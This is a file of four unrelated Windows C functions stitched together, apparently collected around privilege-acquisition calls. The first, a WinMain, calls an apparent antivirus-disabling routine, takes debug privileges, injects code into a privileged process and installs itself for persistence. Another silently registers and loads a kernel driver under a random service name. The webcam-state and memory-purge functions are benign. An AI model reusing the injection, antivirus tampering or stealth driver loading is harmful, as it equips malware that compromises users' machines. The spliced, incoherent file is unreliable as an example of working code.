//-----------------------------------------------------------------
BOOL __stdcall WinMain(HINSTANCE, HINSTANCE, PTSTR, int){
char buf[128];
AVPsex();
GetSystemDirectory(buf, 128);
strcat(buf, "\\");
strcat(buf, MY_MACRO_RECORD_NAME);
strcat(buf, ".exe\0");
GetMaxPriv();
// InstallAndRegisterDrivers();
if(GetPrivilege("SeDebugPrivilege")){
if(FileExist(buf)){
InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);
}else{
InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);
AddIntoSystem(MY_MACRO_RECORD_NAME, 1);
AddIntoSystem(MY_MACRO_RECORD_NAME, 0);
return FALSE;
}
}else{
if(FileExist(buf)){
InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);
}else{
InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);
AddIntoSystem(MY_MACRO_RECORD_NAME, 1);
AddIntoSystem(MY_MACRO_RECORD_NAME, 0);
return FALSE;
}
}
return FALSE;
}
void SetRunTimeState(HTTPCONNECTION hConnection)
{
g_WebCamState.ucUserCheck = (unsigned char)g_ConfigParam.bUserCheck;
if (g_WebCamState.ucUserCheck)
g_WebCamState.ucPrivilege = (unsigned char)GetPrivilege(hConnection);
else
g_WebCamState.ucPrivilege = 0;
g_WebCamState.ucMotionDetectWay = g_ConfigParam.ucMotionDetectWay;
}
VOID StartSys(LPCSTR chSysPath)
{
NTSTATUS St;
BOOL bRet = FALSE;
HKEY hKey;
CHAR chRegPath[MAX_PATH];
WCHAR wcLoadDrv[MAX_PATH];
CHAR chImagePath[MAX_PATH] = "\\??\\";
UNICODE_STRING usStr;
DWORD dwType;
GetPrivilege(SE_LOAD_DRIVER_PRIVILEGE);
DbgPrint(__FUNCTION__"(): driver path '%s'\n",chSysPath);
DWORD dwId = GetTickCount();
_snprintf(chRegPath,RTL_NUMBER_OF(chRegPath)-1,"system\\currentcontrolset\\services\\%x", dwId);
_snwprintf(wcLoadDrv,RTL_NUMBER_OF(wcLoadDrv)-1,L"\\registry\\machine\\system\\currentcontrolset\\services\\%x", dwId);
strncat(chImagePath,chSysPath,sizeof(chImagePath));
if (RegCreateKey(HKEY_LOCAL_MACHINE,chRegPath,&hKey) == ERROR_SUCCESS)
{
RegSetValueEx(hKey,"ImagePath",0,REG_SZ,(LPBYTE)&chImagePath,strlen(chImagePath)+1);
dwType = SERVICE_KERNEL_DRIVER;
RegSetValueEx(hKey,"Type",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD));
dwType = SERVICE_DEMAND_START;
RegSetValueEx(hKey,"Start",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD));
RegCloseKey(hKey);
RtlInitUnicodeString(&usStr,wcLoadDrv);
St = NtLoadDriver(&usStr);
DbgPrint(__FUNCTION__"(): NtLoadDriver status %x\n",St);
}
else
{
DbgPrint(__FUNCTION__"(): RegCreateKey last error %x\n",GetLastError());
}
}
static int cmd_dropcaches(void)
{
HANDLE hProcess = GetCurrentProcess();
HANDLE hToken;
HMODULE ntdll;
DWORD(WINAPI *NtSetSystemInformation)(INT, PVOID, ULONG);
SYSTEM_MEMORY_LIST_COMMAND command;
int status;
if (!OpenProcessToken(hProcess, TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
return error("Can't open current process token");
if (!GetPrivilege(hToken, "SeProfileSingleProcessPrivilege", 1))
return error("Can't get SeProfileSingleProcessPrivilege");
CloseHandle(hToken);
ntdll = LoadLibrary("ntdll.dll");
if (!ntdll)
return error("Can't load ntdll.dll, wrong Windows version?");
NtSetSystemInformation =
(DWORD(WINAPI *)(INT, PVOID, ULONG))GetProcAddress(ntdll, "NtSetSystemInformation");
if (!NtSetSystemInformation)
return error("Can't get function addresses, wrong Windows version?");
command = MemoryPurgeStandbyList;
status = NtSetSystemInformation(
SystemMemoryListInformation,
&command,
sizeof(SYSTEM_MEMORY_LIST_COMMAND)
);
if (status == STATUS_PRIVILEGE_NOT_HELD)
error("Insufficient privileges to purge the standby list, need admin access");
else if (status != STATUS_SUCCESS)
error("Unable to execute the memory list command %d", status);
FreeLibrary(ntdll);
return status;
}
